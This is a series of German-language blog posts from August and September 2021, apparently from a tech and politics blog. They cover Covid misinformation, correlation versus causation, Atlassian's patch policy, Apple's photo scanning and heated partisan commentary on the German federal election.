[l] Ich sage hier ja schon länger, dass Bildung wichtig ist. Wer bei der Bildung spart, der hat im Leben Nachteile.
Aktuelles Beispiel:
Patienten haben wiederholt eine Intubation abgelehnt, die eine lebensrettende Maßnahme ist, weil sie gehört haben, dass die Überlebensrate bei einer Intubation schlecht ist. Aber das liegt nicht an der Intubation, sondern an dem schlechten Zustand, der eine Intubation erforderlich macht.
Das ist genau dieselbe Kompetenz, die neulich schon fehlte.
Wenn viele Covid-Leute nach der Intubation sterben, dann kannst du daraus nicht schließen, dass Intubation tödlich ist! Korrelation ist nicht Kausalität!
Wenn du beobachtest, dass a und b häufig zusammen auftreten, kann das entweder heißen, dass a b auslöst, dass a b begünstigt, dass b a auslöst, dass b a begünstigt, dass a und b einen gemeinsamen Auslöser haben, dass es überhaupt keinen Zusammenhang gibt, oder es kann sich um ein Messartefakt handeln.
Schöne Beispiele für zusammenhanglose Korrelationen gibt es unter dem Stichwort spurious correlations.
Ein schönes Beispiel für Messartefakte gab es in dem Film "Fog of War", den ich schon mehrfach empfohlen habe, und es hier wieder tun möchte. Das ist ein Interview mit Robert McNamara (googelt den mal, wenn ihr nicht wisst, wer das ist). McNamara hat u.a. im zweiten Weltkrieg in der Army die Effizienz der Luftangriffe optimieren sollen. Sie haben festgestellt, dass lauter Flieger mit Schäden zurückkamen. Sie haben dann geguckt, was für Schäden das so waren, und der Report schlug vor, die Flugzeuge an den Stellen robuster zu machen. Aber wenn ihr da mal genauer drüber nachdenkt, dann ist das genau die falsche Antwort, denn das sind die Flugzeuge, die zurückgekommen sind. Die ANDEREN Stellen sind die, die robuster gemacht werden müssen, denn die dort getroffenen Flieger sind nicht zurückgekommen und waren daher nicht Teil der Messung.
Ein Beispiel für gemeinsame Auslöser wäre z.B., wenn dein Laptop mit der Zeit immer langsamer wird, und du annimmst, es habe was mit Windows zu tun, was mit jedem Update langsamer wird. Tatsächlich müsstest du aber mal die Lüfter reinigen und das Windows ist genau so ein Opfer des Überhitzungs-Schutz durch Langsamschaltung wie deine Anwendungssoftware.
Besonders nervig ist es, wenn man etwas zu erreichen versucht, und das dann eintritt. Dann heißt das eben nicht, dass notwendigerweise deine Bemühungen zielführend waren. Sie können sogar kontraproduktiv gewesen sein, aber ein anderer, stärkerer Effekt hat das aufgehoben. Ein plakatives Beispiel ist die These, dass die sinkende Kriminalität in den 1990er Jahren nicht etwa auf die Bemühungen der Politik zurückzuführen ist, sondern darauf, dass das Benzin bleifrei wurde. Blei lagert sich im Hirn ab und führt u.a. zu Aggressionen.
Dass Menschen so auf Korrelationen stehen und immer direkt erstmal einen Kausalzusammenhang annehmen, ist evolutionär sinnvoll. Wenn da drüben im Busch Vögel hochfliegen, kann das mehrere Ursachen haben, aber die Annahme, dass das mit einem Raubtier zu tun hat, rettet Leben.
Insofern ist das nicht dumm oder ungebildet, auf Korrelationen reinzufallen. Aber man muss sich dessen halt bewusst sein und aktiv gucken, ob es noch andere Erklärungen gibt.
Insofern: Wenn ihr mit Covid ins Krankenhaus kommt und die wollen euch intubieren, dann geht erstmal davon aus, dass die wissen, was sie tun. Ohne Intubieren ist die Überlebenswahrscheinlichkeit noch viel geringer. Noch besser wäre es, wenn ihr euch einfach alle impfen lasst, dann muss hoffentlich niemand von euch wegen Covid intubiert werden. (Danke, Uli)
[l] Der Strom der Covidioten in meiner Inbox nimmt nicht ab.
Ich pack ab jetzt Deppen, die mir Telegram-Talking-Points schicken, direkt ins Killfile.
Aktueller Desinformations-Höhepunkt: Angeblich habe Ivermectin die indische Provinz Uttar Pradesh vor Covid gerettet. Quelle ist ein Artikel aus dem Mai (!) diesen Jahres, als die örtliche Regierung das verkündete.
Wie ist die Datenlage für diese Behauptung? Nun, es gibt keine. Diese Provinz hat im Kampf gegen Covid einmal alles verkackt, was sie verkacken konnten. Es gibt einen Wikipedia-Artikel zu deren Covid-Verkacken.
Das war so das übliche, was die verkackt haben. Zu wenig Fälle ausgewiesen, zu wenig Impfstoff, furchtbare Zustände in den Covid-Krankenhäusern. Was tat die Regierung im Panikzustand also? Verteilte Ivermectin, damit es wenigstens so aussieht, als täten sie was.
Hat das geholfen? Dafür gibt es keine Indizien. Deren Covid-Fälle gingen runter, aber nicht wegen Ivermectin sondern weil sie einen Lockdown gemacht haben, so richtig volles Programm inklusive Ausgangssperren. Die wurden jetzt (!) erst gelockert vor ein paar Tagen.
Glaubt die Regierung, Ivermectin hätte sie gerettet? Nein. Das sieht man ganz gut daran, dass sie mit Hochdruck eine Impfkampagne fahren. Achtung: Die rechnen da in Crore, das ist ein Hindi-Wort für 10 Mio. 9 Crore sind also 90 Mio. Der Wert mit den 9 crore war am 16. September. Am 20. August waren es noch 6 crore.
Aber vergessen wir mal die ganzen Daten und Fakten für einen kurzen Moment.
Die Covidioten, die bei uns hinter der Regierung eine massive Verschwörung wittern, die uns alle umbringen will, die kein Wort glauben, das aus einem Regierungsmitarbeiter kommt, … die haben keine Sekunde gezögert, den Ivermectin-Bullshit der gerade massiv versagenden Regionalregierung einer obskuren indischen Provinz zu glauben. Und im Gegensatz zu unseren Regierungsleuten haben die Inder nicht mal so getan, als gäbe es eine ordentliche wissenschaftliche Studie. Das war einfach eine Runde Wahlkampf-Bullshit des Gouverneurs und basierte auf dem Bauchgefühl einer Regierung, die mit dem Rücken zur Wand stand, und jetzt dringend zeigen musste, dass ihnen das nicht völlig entglitten ist. DENEN haben die Covidioten geglaubt.
Kurze Durchsage an der Stelle: Der nächste, der mir einen Link von gatewaypundit oder tkp.at schickt, landet direkt im Killfile.

Sat Sep 18 2021

[l] Der Iran und die arabischen Länder sind bekannt für ihre prachtvolle Fantasie, wenn es um Verschwörungstheorien geht.
Starker Regen? Israel war Schuld! Stromausfall? Sabotage von Israel! Nuklearwissenschaftler erschossen? Israelischer Mordroboter!
Several Iranian news organizations reported that the assassin was a killer robot, and that the entire operation was conducted by remote control. These reports directly contradicted the supposedly eyewitness accounts of a gun battle between teams of assassins and bodyguards and reports that some of the assassins had been arrested or killed.
Gut, nicht immer ist das automatisch falsch, nur weil es eine Verschwörungstheorie ist, wie sich rausstellt:
But it was also the debut test of a high-tech, computerized sharpshooter kitted out with artificial intelligence and multiple-camera eyes, operated via satellite and capable of firing 600 rounds a minute.
Und wir haben uns Sorgen gemacht wegen Mini-Drohnen mit Giftstachel in Insektenform!

Mon Sep 13 2021

[l] Noch ein Detail zu Atlassian: Das hier liest sich so, als gibt es von denen ohne laufenden Supportvertrag nicht mal für kritische Sicherheitslücken Patches. Damit ist das aus meiner Sicht kein Supportvertrag sondern ein Schutzgeldabkommen.
Das finde das absolut unseriös und muss mich ernsthaft fragen, wie Hersteller mit so einem Geschäftsgebahren überhaupt jemals Abnehmer für ihre Produkte finden können.
In keiner anderen Branche wäre sowas denkbar. Man stelle sich mal vor, der japanische Airbaghersteller damals hätte einfach keinen allgemeinen Rückruf gemacht sondern nur Kunden mit Supportverträgen ein nicht tödliches Ersatzgerät gegeben. Oder bei explodierenden Batterien in E-Autos oder Smartphones würden sie nur Leuten mit laufendem Supportvertrag ihre Bombe entschärfen. (Danke, Hayo)
[l] Meldung des Tages:
Die SPD habe bei Entscheidungen in der Nachkriegsgeschichte »immer auf der falschen Seite« gestanden, sagte Laschet auf dem CSU-Parteitag. Die SPD reagiert dünnhäutig und wehrt sich mit Trump- und Nazivergleichen.
Die Verbrecherpartei und die Verräterpartei werfen sich gegenseitig Versagen vor? Da kann es nur Gewinner geben!
Da stellt sich doch direkt die Frage: Wieso habt ihr denn mit den anderen eine große Koalition gemacht, wenn das solche Versager und Verbrecher sind?
Sehr geil auch: Die CDU, die gerade den Planeten in den Klimatod altmaiert, DIE werfen anderen vor, auf der falschen Seite zu kämpfen? Die haben systematisch Solar und Wind zurückgebaut und runtergefahren. Die weltweite Technologieführerschaft haben sie lieber nach China geschoben. Und DIE werfen jetzt der SPD vor, auf der falschen Seite gekämpft zu haben!
Die Partei von dem Laschet, der nochmal schnell ein Kohlekraftwerk gebaut hat!
Die Partei, die es für mit einer Demokratie vereinbar halten, wenn man den Bürgern ihre Computer und Telefone verwanzt, und Sicherheitslücken absichtlich offenhält!
Die Partei mit dem Maut-Debakel!
DIE werfen ANDEREN vor, auf der falschen Seite gekämpft zu haben!!
Unfassbar.
Ich meine, sie haben natürlich Recht. SPD und CDU sind beide völlig indiskutabel und haben sich gegenseitig verdient. Und die FDP gehört auch noch in die Liste. Die glauben alle noch an den ewigen Wachstum als Lösung für alles. Gut, außer dafür dass wir die Ressourcen des Planeten schneller verbrauchen als sie sich regenerieren können. Aber darum kann sich ja die nächste Regierung kümmern!1!!
Das geilste ist ja, dass der Scholz jetzt Werbung macht, er sei der Klimakanzler. Als ob die nicht die letzten Legislaturperioden an der fucking Regierung gewesen wären!
Ich glaube ja, die CDU verkackt gerade absichtlich. Die wollen, dass jetzt mal jemand anderes ihren Trümmerhaufen wieder zusammenklaubt. Der macht dann die ganzen notwendigen Entscheidungen, vor denen die CDU seit Jahren wegrennt. Und wenn der fertig ist, und das Volk merkt, dass das Wachstum auf einem Planeten mit endlichen Ressourcen auch nur endlich sein kann, dann kommen die bestimmt zur CDU zurück, denken die sich.
Warum sonst würde irgendjemand Laschet aufstellen, außer der will verlieren?

Thu Sep 9 2021

[l] Keine der Parteien hat ein Wahlprogramm, mit dem sich das 1,5° Temperatursteigerungslimit aus dem Pariser Abkommen erreichen ließe. Am nächsten kommen laut DIW, die die Forschung durchgeführt haben, die Grünen, gefolgt von den Linken.
Allerdings reichen auch deren Programme nicht. CDU und SPD sind weit abgeschlagen, FDP ist noch weiter abgeschlagen, und die AfD konnte gar nicht beurteilt werden, denn:
Eine Bewertung der AfD war Studienleiterin Claudia Kemfert vom DIW zufolge nicht möglich, da die Partei den menschengemachten Klimawandel in Abrede stellt und keine Klimapolitik anstrebe, die sich bewerten lasse.
Ja geil!
Aber nochmal: KEINE der Parteien hat ein Parteiprogramm, mit dem sich die Zielvorstellungen des Pariser Abkommens erreichen lassen. Und die waren bereits herunterverwässert, ihr erinnert euch.
[l] Habt ihr das auch gehört? Der Scholz nimmt die Digitalkonzerne an die kurze Leine? Tut endlich was gegen Steuerdumping-Modelle?
Hier haben mal ein paar Experten nachgerechnet. Ergebnis:
Das Ergebnis ist ernüchternd.
No shit!
Doch es ist eher eine große Luftnummer.
Was? Bei der SPD? Bloß eine Luftnummer?!? Das kann doch nicht sein! Die haben doch auch beim Kohleausstieg schon so kraftvoll vorgelegt!
Hier das Beispiel Netflix:
Die Steuerquote würde nach den Berechnungen des "Netzwerk Steuergerechtigkeit" nur marginal steigen, von 0,2 auf 0,3 Prozent.
Und hier Google:
Allerdings bliebe die Steuerquote von Google in Deutschland mit 7,3 Prozent deutlich unter dem deutschen Durchschnittssteuersatz von 30 Prozent und auch die Mindeststeuer von 15 Prozent würde Google in Deutschland nicht bezahlen.
Na DENEN haben wir es aber gezeigt!!
Die SPD, wir erinnern uns, das war die Partei mit der Sozialkompetenz. Die, die erst mit Hartz IV die eine Hälfte arm gemacht und zur Zwangsarbeit verpflichtet hat, und dann den Rest mit der Riesterrente über den Tisch gezogen haben.
Ihr könnt euch ja mal fragen, wo die Kohle herkommen wird, wenn nicht von den Konzernen.
Na? Kommt ihr selber drauf, oder muss ich spoilern?
Schön auf den Punkt bringt es Fabio de Masi von den Linken (warum wählt die eigentlich niemand?):
"Herr Scholz hat versucht, einen so ambitionslosen Kompromiss zu finden, dass auch Facebook Beifall geklatscht hat und es keinem wehtut"
Das ist ihm auch gelungen! Ein Teufelskerl, dieser Scholz!
Aber warte, was tut denn der Scholz, wenn man ihn mit seinem Totalversagen konfrontiert? Das hatte ich ja neulich schon im Blog. Erst verkacken, dann kleinreden, dann herumlügen, dann bescheißen. Wir sind gerade in der Herumlügen-Phase:
Und Olaf Scholz? Der erklärt auf Nachfrage von frontal, die Zahlen würden vermutlich nicht stimmen. Ein Vorwurf, den die Finanzexperten von Netzwerk Steuergerechtigkeit entschieden zurückweisen.

Tue Sep 7 2021

[l] Wie schlimm ist die Lage? So schlimm: Wissenschaftler-Rebellion leaked 3. Klimabericht des IPCC. Stellt sich raus: Der ist schon fertig. Die Wissenschaftler haben ihren Teil gemacht. Aber veröffentlicht werden sollte er erst in sechs Monaten. Warum? Weil die beschissenen Täter aus den ganzen versifften Täterregierungen da jetzt nochmal monatelang Passagen rausstreichen und verwässen wollen, die sie für zu brisant halten, weil sie offenbar machen, dass sie seit Jahrzehnten vorsätzlich die Zukunft unserer Spezies verheizt haben.
Zitat:
Es ist auch wichtig zu sagen, dass der Report, den wir geleakt haben, unsere Wissenschaftlerinnen und Wissenschaftler so abgegeben haben. Die arbeiten nicht mehr am Report. Alle, die ihn in den nächsten sechs Monaten lesen, sind Repräsentanten der verschiedenen Regierungen, also keine Wissenschaftler. Sie sind von Regierungen, die schon in der Vergangenheit Formulierungen geändert oder gestrichen haben, weil sie nicht in die politische Agenda passen.
Das ist schon krass. Vergesst nicht, dass die Wissenschaftler im Allgemeinen abhängig vom Staat sind. Ihr Arbeitsplatz, ihr Gehalt, ihr Überleben hängen vom Staat ab.
Und DIE sagen jetzt: Die Lage ist so krass, dass wir das riskieren, um gegen den Staat zu leaken, von dem unsere Existenz abhängt. Weil die sich unredlich verhalten haben und es wieder zu tun vorhaben.
[l] In der aktuellen Forsa-Sonntagsfrage liegt die CDU unter 20%.
Wie jeder Erfolg hat auch dieser viele Mütter und Väter.
Danke, Frau Merkel, dass Sie jeden weggebissen haben, der Ihnen hätte gefährlich werden können. Das ist der Grund, wieso es jetzt nur noch Luschen gibt.
Danke, Herr Laschet. Sie waren derjenige, der die CDU in den Boden gerammt hat.
Danke, Rezo.
Übrigens, wo wir gerade beim Rückbau der CDU waren: die Kanzlerfrage ist beantwortet. Der Wählerwille war lange nicht mehr so klar erkennbar. Deutschland wünscht sich mehrheitlich als neuen Kanzler: Keinen von denen.
Ich werde ja gelegentlich gefragt, wen man denn jetzt wählen soll, die seien ja alle korrupt. Für mich sieht die Situation ziemlich klar aus. Die Verbrecherpartei, die Verräterpartei und die Olivgrünen will ich ja gerade verhindern. FDP und AfD gehen überhaupt gar nicht, und die nächst-größte Partei, die rechnerisch eine Chance auf Kanzlerstellen hat, sind die Linken. Selbst wenn man davon ausgeht, dass die Linken mit der SPD koalieren werden, sollte man die Linken wählen und nicht die SPD. Jede Stimme für die Linken schwächt die SPD in der Koalition.
Wenn es richtig gut läuft, und sich die Wähler daran erinnern, dass die SPD gerade den Planeten aktiv vernichtet, sie mit Hartz IV in die Armut gezwungen hat, den ersten (verfassungswidrigen!) Angriffskrieg in der Geschichte der Bundesrepublik Deutschland zu verantworten haben, und jetzt die ganzen beschissenen CDU-"Sicherheits"-Maßnahmen mitgetragen haben, und dass Kanzlerkandidat Scholz in Wirecard und Cum-Ex verwickelt ist und Folter mit zwangsverabreichtem Abführmuttel eingeführt hat, ... dann könnte am Ende sogar die SPD der Juniorpartner in der Koalition werden.
In den Berliner Wahlen werde ich dieses Mal die PARTEI wählen. Ich sah neulich bei Jung und Naiv ein Video mit der PARTEI und sie ist sehr gut. Bisher sind die mir auch in ihrer politischen Arbeit nur positiv aufgefallen. In so gut wie jeder ethischen Frage haben die sich auf der richtigen Seite positioniert. Das sind die letzten echten Humanisten im Parlament, wenn ihr mich fragt. Hier ist ein schönes Beispiel. Erinnert ihr euch daran, wann eine andere Partei eine Parteispende für den Kauf von Masken für Obdachlose und Flüchtlingsheime ausgegeben hat? In dem Video haben sie gesagt, sie seien in Umfragen in Berlin gerade bei 4,5%. Das wäre mir eine Ehre, die über 5% zu hieven.
Update: Der Fairness halber auch hier eine Gegenposition. In Berlin sieht es gerade nach vier Jahren Siechtum, Elend und Verwüstung aus, wenn Franziska "Clankriminalität" Giffey regierender Bürgermeister wird. Die Giffey hat angesagt, dass sie lieber mit Grünen und FDP die Apokalypse immanentisieren will als mit den Linken. Wenn man also als Wähler klar kommunizieren will, dass diese Ampel der Korruption nicht akzeptabel ist, muss man die Linken wählen.
Deren Kandidat ist Klaus Lederer, der in den letzten Jahren nicht weiter aufgefallen ist, weil er lieber seinen fucking Job gemacht hat, als Talkshowtourismus und verkackte Wahlkampfstunts zu pullen. Der verlor auch keine Zeit damit, sich aus einem Wissenschaftsbetrugs-Skandal rauswieseln zu müssen. Ist euch aufgefallen, dass man aus Berlin kaum Geheule von schließenden Kulturinstitutionen gehört hat in der Pandemie? Das war der Lederer, quasi im Alleingang. Ich weiß ja nicht, ob das realistisch ist, sich den zu wünschen, aber in Wahlen sollte es ja nicht um Realismus gehen sondern um den Wählerwunsch. Und wünschenswert ist der auf jeden Fall. Gar kein Vergleich zu Giffey und co.
Wenn ihr denkt, JETZT ist Berlin scheiße, dann wartet mal, bis die Giffey regiert! *grusel*
Update: Danke auch an Axel Voss. Ohne dessen "Einsatz" in der EU hätte sich Rezo gar nicht für die Politik interessiert.

Wed Sep 1 2021

[l] In Texas ist jetzt Abtreibung illegal.
One of the nation's most restrictive abortion bills — which bans abortions as early as six weeks into pregnancy — took effect at midnight after the U.S. Supreme Court did not take action on an emergency appeal by Texas abortion providers Tuesday.
Nach sechs Wochen haben die meisten noch gar keinen Schwangerschaftstest gemacht.

Sun Aug 22 2021

[l] Angesichts der Taliban-Machtübernahme in Afghanistan entdecken Tech-Konzerne den Datenschutz. Clubhouse (!) ist rumgegangen und hat proaktiv aus den Accounts ihrer afghanischen User identifizierende Bilder und Daten gelöscht.
Größter Lacher an der Meldung ist aber das hier:
Facebook hatte im Zuge der jüngsten Entwicklungen in der letzten Woche ähnliche Schritte ergriffen. So konnten in Afghanistan keine Freundeslisten von Facebook-Konten eingesehen oder durchsucht werden. Zudem sollte es afghanischen Nutzern leichter gemacht werden, das eigene Profil zu sperren.
Seht ihr? War gar nicht so schwer! Da hätten wir auch selber drauf kommen können! Alles was wir brauchen ist dass hier mal die Taliban einmarschiert! Dann lässt Facebook auch uns unsere Profile sperren!!1!
[l] Old and busted: Etablierte Medien machen Twitter-Berichterstattung.
New hotness: Etablierte Medien machen Youtube-Berichterstattung.
Das Rezo-Video, um das es geht, ist hier zu finden.
Ich bin ja mit dem Video diesmal nicht so zufrieden, muss ich euch sagen. Ob deren PR eine Lüge ist oder nicht ... ach weißt du, da rechnet doch niemand damit, dass die uns nicht ins Gesicht lügen. Die PR-Leute der Parteien halten das doch für ihren Job, uns ins Gesicht zu lügen. Genau wie die Parteien selber uns gewohnheitsmäßig ins Gesicht lügen.
Dass die Grünen die Männer aus ihrem Foto rauscroppen? Geschenkt. Dass die so drehen ist ja wohl jedem klar, seit die den Habeck aus ihrer Parteispitze rausgecroppt haben, damit nicht so auffällt, wie schlecht die Baerbock ist.
Dass der Laschet in Flutgebieten lacht? Geschenkt.
Wichtiger finde ich den Charakter der Leute und der Parteien. Wofür stehen die?
Der Laschet steht für die Klausurenaffäre. Laschet ist der schlechte Schüler, der von seinen Seilschaften mitgezogen wurde. Laschet ist der schwache Thronfolger, der vom Apparat installiert wird, damit die Berater in Ruhe durchregieren können, ohne dass jemand mit eigenen Gedanken im Weg herumsteht. Sobald was nicht von selbst gut läuft, ist seine erste Reaktion: Bescheißen. DAS ist Laschet.
Der Charakter der CDU ist: Nachteile für die Gesellschaft bis hin zur Zerstörung der eigenen Spezies in Kauf nehmen und sogar durch eigene Taten vorantreiben, um sich kurzfristig persönlich bereichern zu können. Die Maskenaffären, der Rückbau der erneuerbaren Energien, die Uploadfilter, es folgt immer demselben Muster. Vorher lügen, dann tun, was eh alle Zyniker die ganze Zeit gesagt haben, das sie tun werden. Unvertrauenswürdiger als die CDU geht es gar nicht. Sogar die Verräterpartei und die AfD stimmen ab und zu versehentlich falsch ab und tun etwas nicht maximal schlechtes.
Der Charakter der SPD ist: Die haben keinen Charakter. Wenn sich der Wind dreht, dreht sich auch die SPD. Wenn es mal keinen Wind gibt, dann richtet die SPD maximalen Schaden an. Führt illegale Angriffskriege, schafft den Sozialstaat ab, dereguliert den Finanzsektor, privatisiert staatliche Unternehmen, ... Völlig undiskutabel.
Der Charakter der Grünen ist: Die haben keinen Charakter. Wenn die erstmal an der Macht sind, machen sie, was sie für nötig halten, um an der Macht zu bleiben. Illegaler Angriffskrieg? Klar machen wir da mit! Wokeness statt politischer Inhalte? Klar machen wir da mit! Dagegensein und Lamentieren können die gut, aber sobald sie an der Regierung sind, machen sie genau das, was vorher und nachher die CDU gemacht hat. Niemand braucht diese Partei. Wenn du als Wähler eine Partei wählen willst, deren einziges Ziel der Machterhalt ist, dann wähl die CDU. Es brauchte zwar Fukushima, aber die CDU brachte uns den Atomausstieg.
Die Linkspartei hat mich jetzt auch nicht wirklich vom Hocker gehauen, wo sie mal Regierungskompetenz hatte, aber die Linkspartei sind die einzigen, bei denen sich das Parteiprogramm so liest, als hätte da jemand Zeit investiert, um mal nachzudenken, wie man die Gesellschaft gestalten möchte. Die CDU hält sich ja nicht mal an den eigenen Koalitionsvertrag, für die ist das Parteiprogramm eher Klopapier-Reserve.
Wir haben hier, wie so häufig, die Wahl zwischen marodierenden Triebtätern, die alles kaputtmachen, und auf dem Weg noch soviel Geld raustragen, wie in ihre Taschen passt, und auf der anderen Seite zwischen maximal inkompetenten Vollversagern. Marodeure wie Altmaier und Nieten wie Klöckner, Scheuer, Maas, Spahn.
Der afghanische Ex-Präsident (der mit den vier Autos und einem Hubschrauber voll Bargeld geflohen ist) wäre bei uns in der CDU gewesen.
Es ist symptomatisch für das Gesamtsystem, wie die nächste Generation jetzt an Plagiatsaffären scheitert. Die haben sich das angeschaut und gesagt: Hey, Kompetenz ist hier offensichtlich nicht nötig. Da reicht ein bisschen blenden. Wieso wir von denen jetzt plötzlich echte Kompetenz erwarten, das leuchtet ja auch nicht wirklich ein. Als ob irgendjemand von deren Vorgängern nicht auch bloß ein Polit-Blender gewesen wäre!
Die Baerbock und Giffey und der Scholz, das sind m.E. so Leute, die sich nach unten orientieren. Die gucken sich um, finden ein paar ethikfreie Pfuscher, und sagen sich: Also besser als DIE bin ich ja wohl alle mal!1!! Und argumentieren dann am besten ein bisschen im Kreis: Dass ich noch im Amt bin, zeigt ja wohl, dass ich eine unersetzbare Spitzenkraft bin!!1!
Keiner von denen ist daran interessiert, das Land voranzubringen. Die wollen bloß Kanzler / Bürgermeister werden, weil man da ein gutes, sicheres Gehalt kriegt. Die Generation ICH ICH ICH.

Sat Aug 14 2021

[l] Die Code of Conduct-Leute haben Perl den Rest gegeben.
Kennt eigentlich jemand ein Projekt, das die besser gemacht haben?

Tue Aug 10 2021

[l] Hier hat mal jemand eine Frage an die Bevölkerung.
Der stellt sich ähnliche Fragen wie ich. Wieso irgendjemand die CDU wählen würde. Oder die SPD.
Triggerwarnung: Leider biegt er dann zu den Grünen ab.
Wer anfangs findet, dem Video fehlt der nötige Zorn: Dranbleiben.
Wer nach Kretschmann immer noch die Grünen an der Regierung sehen will, der da CDU-Politik für CDU-Wähler gemacht hat, die dem Mappus einen auswischen wollten, der muss auch vergessen haben, dass die Grünen Hartz IV zu verantworten haben und unsere Bundesrepublik in den ersten (verfassungsbrechenden!) Angriffskrieg seiner Geschichte geführt haben.

Fri Aug 6 2021

[l] Wo wir gerade bei "Not My Job" waren: Die Staatsanwaltschaft ermittelt gegen den Landrat von Ahrweiler wegen fahrlässiger Körperverletzung und Tötung durch Unterlassen.
Ich nehme das nicht sonderlich ernst. Niemals wird in unserem Land ein CDU-Landrat wegen Fehlverhaltens belangt. Den Präzedenzfall können die nicht entstehen lassen, sonst sind morgen alle im Knast.
Die Staatsanwalt tut jetzt so, als würde sie prüfen, der Landrat tut so, als sei das eine Prüfung und "verteidigt" sich, die Presse ist ruhiggestellt und am Ende verläuft das im Sande.
Rein von einem Scifi-Aspekt her ist das natürlich eine schöne Vorstellung, dass CDU-Politiker in den Knast müssen, weil ihretwegen Leute gestorben sind. Aus meiner Sicht ist der Knast der ideale Unterbringungsort für CDU-Politiker.
Update: Einige Leser stören sich an der auffallenden Vorverurteilung hier.
Das stimmt natürlich auffallend. Ermittlungen einleiten heißt ja erst mal gar nichts. Trotzdem haben sie in dem Artikel fett ein Foto von dem Typen und zählen auf, was er alles möglicherweise getan haben könnte.
Was wir hier sehen ist purer CDU-Wahlkampf. Nach den Affären mit dem Maskenkauf und den anderen Spahn-Verkackern steht die CDU im Wahlkampf inhaltlich eh auf brüchigem Eis. Jetzt auch noch eine klar sichtbare Auswirkung der von der CDU herbeigeführten Klimakatastrophe? Das ist für die der GAU. Daher musste die CDU unbedingt ganz schnell dafür sorgen, dass es so aussieht, als würde bei ihnen parteiintern hart gegen Korruption vorgegangen. Ich glaube, da hat jemand von der CDU auf dem kurzen Dienstweg bei einem alten Kumpel in der ARD angerufen und denen die Story gesteckt, und die ARD hat dann schön Rufmord gemacht. Der Typ ist ein Bauernopfer, damit die CDU im Wahlkampf nicht ganz so korrupt aussieht, wie sie ja tatsächlich ist.
Genau deshalb bin ich mir auch sicher, dass der Typ nichts zu befürchten hat. Das muss nur bis zur Wahl den Anschein haben, als bekämpfe die CDU Korruption.
[l] Apple will jetzt Fotos ihrer Kunden auf bekannte Kindesmissbrauchsabbildungen scannen. Und zwar sowohl in der Cloud als auch auf den Geräten selbst.
Das Verfahren, das sie das benutzen, ist auffallend wenig schlimm. Die haben das sozusagen umgedreht. Man erspielt sich Awards, wenn man bestimmte Hashes vorweisen kann, die nicht öffentlich bekannt sind. Nur dass der Hash halt aus den Bildern berechnet wird und die Awards dann eine Meldung beim FBI sind.
Es werden also weder deine Fotos gegen deinen Willen in die Cloud hochgeladen zum Analysieren, noch läuft da irgendeine freidrehende "KI" und macht Pornoerkennung.
Wobei, eine freidrehende KI soll es wohl auch geben, und zwar um Eltern zu warnen, wenn ihre Kinder Nacktfotos von sich selbst machen.
Ja, äh, schön ist das natürlich alles nicht. Aber von allen Dinge, die Apple hätte implementieren können, ist das am unteren Ende der Schlimmheitsskala. Ich gebe ja Youtube die Schuld. Die haben das Fluttor geöffnet, dass man Dinge automatisiert scannen kann. Damit haben sie die ganze Welt in den Abgrund gestürzt. Jetzt wird alles ständig überall gescannt.
Klar findet das nichts am Ende. So wird das auch hier sein. Die haben eine Datenbank mit Hashes von bekannten Bildern. Angeblich geht es ja hier um die Bekämpfung von Missbrauch. Alte Bilder kursieren lassen ist zwar nicht schön aber da ist der Missbrauch ja schon geschehen und hoffentlich geahndet, denn die Polizei hat die Bilder gesehen und ermittelt und hoffentlich jemanden inhaftiert. Den Missbrauch von Kindern zum Anfertigen von neuen Bildern hält das mit den Hashes hier natürlich überhaupt nicht auf.
Und so ist das am Ende wie immer. Ihr tut so, als ob ihr uns angemessen bezahlt, und wir tun so, als hätten wir für das Geld gearbeitet. Das tatsächliche Lösen des tatsächlichen Problems? Not my job.
Update: Eine Sache fällt noch auf. Die Leute laden ja ihre Backups in die Cloud hoch, inklusive Fotos. Eigentlich würde es ja völlig reichen, wenn Apple in ihrer Cloud die Bilder scannt. Der ganze Aufwand mit Software auf die Geräte schieben, und dann dafür sorgen müssen, dass ein Angreifer auf den Geräten nicht sehen kann, welche Hashes hier gesucht werden, den Schuh hat sich Google gar nicht angezogen. Die scannen einfach in der Cloud rum.
Warum macht Apple das also?
Nun, gibt zwei offensichtliche Erklärungsansätze. Entweder sie wollen hier wirklich Kriminelle finden, und glauben nicht, dass die Cloud-Backup angeschaltet haben. Oder sie planen ihre Cloud-Backups so zu machen, dass sie da gar nicht reingucken können, selbst wenn sie wollten. Kryptografisch wäre das gar kein Problem, und würde auch ihren Kopf aus gleich mehreren Schlingen ziehen. Wenn ich einen Cloud-Backup bauen sollte, hätte ich das von Anfang an so gemacht.
Dass Kriminelle Cloud-Backup abschalten, glaube ich auch. Aber dass es Apple hier tatsächlich um die Kriminalitätsbekämpfung geht glaube ich auch nicht. Da wird jemand vom FBI den Tim Cook zu einem Abendessen eingeladen haben und dem ein paar fiese Bilder gezeigt haben, und dann hat Tim Cook sich bereiterklärt, ein bisschen Placebo auszurollen, damit man sagen kann, man helfe. Vielleicht auch als Pfand für die nächste Iteration gedacht, wenn das FBI mal wieder Hintertüren fordert. Ich glaube ja nicht, dass das funktioniert. Eher anders herum. Wenn man denen einmal einen kleinen Finger hinhält, beißen sie den ganzen Arm ab.
Der Nachteil von verschlüsselten Cloud-Backups ist, dass man dann auch Kunden mit Demenz nicht helfen kann, oder Hinterbliebenen.

Mon Aug 2 2021

[l] Früher machte man Kanonenbootdiplomatie, heute macht man Preisdiplomatie.
Fall 1: China und Australien. Australien stichelt seit Jahren gegen Chinas Menschenrechtsverletzungen (Australien, wir erinnern uns, hat selbst gerne mal Flüchtlinge in Seenot ertrinken lässt. Und jetzt hat Australien auch noch offen von China Aufklärung über den Ursprung von Covid-19 gefordert. Da ist den Chinesen die Hutschnur geplatzt und jetzt achten die Chinesen selber mal ein bisschen auf Details. Details wie:
Aus China heißt es seit November: Der australische Hummer sei zu stark mit Schwermetallen wie Cadmium belastet.
Und Details wie:
Eine Autostunde weiter liegt das Barrosa Valley mit seinen berühmten Rebsorten Shiraz und Cabernet Sauvgnon: 40 Prozent der Exporte gingen bis 2020 ins Reich der Mitte. Seit vergangenem Jahr wirft China aber Australien Preisdumping vor. Die Folge: Strafzölle von bis zu 212 Prozent. "Das ist kompletter Unsinn", sagt John Geber vom Weingut Chateau Tanunda.
Fall 2: Russland und die EU.
Europas Gasspeicher leeren sich, die Preise steigen stark. Experten vermuten, dass der russische Gazprom-Konzern mit geringeren Lieferungen Druck machen will - damit die Pipeline Nord Stream 2 fertiggestellt wird.
